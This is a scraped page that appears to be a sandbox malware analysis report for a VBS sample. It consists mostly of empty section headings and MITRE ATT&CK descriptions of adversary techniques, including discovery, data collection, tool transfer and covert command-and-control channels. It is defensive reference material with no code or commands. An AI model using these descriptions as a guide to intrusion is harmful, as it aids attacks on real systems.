Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 0xyZ4rY0opA2.vbs

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

User Modules

Hook Summary

Processes

Statistics

CPU Usage

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre